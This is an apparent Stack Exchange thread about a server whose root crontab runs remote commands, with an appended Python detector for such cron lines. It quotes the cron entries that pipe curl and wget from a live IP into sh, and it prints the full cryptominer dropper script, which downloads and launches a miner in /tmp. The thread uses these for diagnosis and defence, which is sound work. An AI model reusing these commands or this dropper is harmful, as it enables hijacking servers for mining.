
For the last three months, every weekend the following instructions appear in root's cron:

0 * * * * curl http://91.230.47.41/img/logo.jpg|sh
0 * * * * wget -O - -q http://91.230.47.41/img/logo.jpg|sh

How do I block this intrusion?

Many thanks.

Serge Ballesta
jakartaom
  • Not enough information to say. Someone other than you has access to your system as root, so you need to treat it as compromised - that normally means wipe and reinstall from known good install media. – Matthew Apr 27 '17 at 13:57
  • Server was definitely compromised. Looks like bitcoin miner. – bigC5012 Apr 27 '17 at 14:35
  • just like Matthew says, your server must have been compromised. BTW what are you running in this server? If there are important data then take a backup and transfer it to new server. Install malware scanners and scan those data. Remove anything suspicious. In this current server append "#" infront of cronjob, this will stop your cronjob to run. @Collin: Do you want to explain briefly about bitcoin miner or any link that can help us know more about it? – Prakash Apr 27 '17 at 16:09
  • @Err0rr Bitcoin miner is where the attacker installs bitcoin mining services that use your server's resources to mine bitcoin for them. I investigated that url a bit further and was able to find the configuration file. hxxp://91.230.47.41/img/logind.conf Using curl (hurl.it) that shows the current crypto pools. This may be related to the apache struts vulnerability. See [here](http://www.securitynewspaper.com/2017/03/29/ddos-server-ransomware-apache-struts-2-cve-2017-5638-campaign/) for a little more about this. – bigC5012 Apr 27 '17 at 17:04

1 Answer


If you wget that image and open it with nano, it contains the following:

#!/bin/sh
rm -rf /tmp/wqbtraqbpv.conf
pkill -f stratum
pkill -f "/tmp/apache"
pkill -f "/tmp/httpd.conf"
pkill -f cryptonight
pkill -f wqbtraqbpv
ps auxf|grep -v grep|grep -v qslulqdbi|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "65.254.63.20"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wqbtraqbpv"|awk '{print $2}'|xargs kill -9
ps -fe|grep qslulqdbi|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /tmp/qslulqdbi.conf
rm -rf /tmp/qslulqdbi.conf
curl -o /tmp/qslulqdbi.conf http://91.230.47.41/img/kworker.conf
wget -O /tmp/qslulqdbi.conf http://91.230.47.41/img/kworker.conf
chmod 777 /tmp/kauditd
rm -rf /tmp/kauditd
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /tmp/kauditd http://91.230.47.41/img/kworker
wget -O /tmp/kauditd http://91.230.47.41/img/kworker
else
curl -o /tmp/kauditd http://91.230.47.41/img/kworker_na
wget -O /tmp/kauditd http://91.230.47.41/img/kworker_na
fi
chmod +x /tmp/kauditd
cd /tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
nohup ./kauditd -c qslulqdbi.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi

I would recommend blocking inbound & outbound traffic of:

91.230.47.41
94.23.8.105
37.59.49.7
37.59.51.212
188.165.214.76
176.31.117.82
188.165.254.85

via firewall rules, as well as removing the cron job.

kworker & kworker_na seem to be clean according to VirusTotal ... but I would check your /tmp/kauditd folder and delete them both.

CaffeineAddiction
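A small defensive check, added here as an example and not part of either post: it scans a crontab for the pattern quoted in the question (a curl/wget fetch piped straight into sh) and for file names from the dropper script in the answer, and it tests whether a file served as an "image" is really a shell script. The crontab text, byte strings, regex and token list are my own constructed assumptions.

```python
import re

# Constructed sample crontab, modelled on the entries quoted in the question
# plus two benign lines so the check has something to ignore.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 * * * * curl http://91.230.47.41/img/logo.jpg|sh
0 * * * * wget -O - -q http://91.230.47.41/img/logo.jpg|sh
30 2 * * * /usr/bin/certbot renew --quiet
@reboot /usr/local/bin/backup.sh
"""

# A fetcher (curl/wget) whose output is piped into a shell interpreter.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|da|z)?sh\b")
# File names and strings used by the dropper script quoted in the answer (assumed list).
SUSPICIOUS_TOKENS = ("/tmp/kauditd", "qslulqdbi", "wqbtraqbpv", "stratum", "cryptonight")


def crontab_command(line):
    """Return the command part of a crontab line, or None for comments/blank lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    nfields = 1 if line.startswith("@") else 5   # "@reboot cmd" vs. "m h dom mon dow cmd"
    parts = line.split(None, nfields)
    return parts[nfields] if len(parts) > nfields else None


def flag_cron_lines(text):
    """Return [(line_no, reason, line)] for entries matching the dropper pattern."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = crontab_command(line)
        if cmd is None:
            continue
        if PIPE_TO_SHELL.search(cmd):
            findings.append((n, "remote-fetch-piped-to-shell", line.strip()))
        elif any(tok in cmd for tok in SUSPICIOUS_TOKENS):
            findings.append((n, "known-miner-artifact", line.strip()))
    return findings


def looks_like_shell_script(data, claimed_ext):
    """True when a file claiming to be an image starts with a shebang instead of image magic."""
    image_exts = ("jpg", "jpeg", "png", "gif")
    return claimed_ext.lower() in image_exts and data.lstrip().startswith(b"#!")


if __name__ == "__main__":
    for line_no, reason, line in flag_cron_lines(SAMPLE_CRONTAB):
        print(f"line {line_no}: {reason}: {line}")
```

Run it against `crontab -l -u root` output (or the files under /etc/cron.d and /var/spool/cron) on a suspect host; any hit is a reason to treat the box as compromised, as the comments above advise.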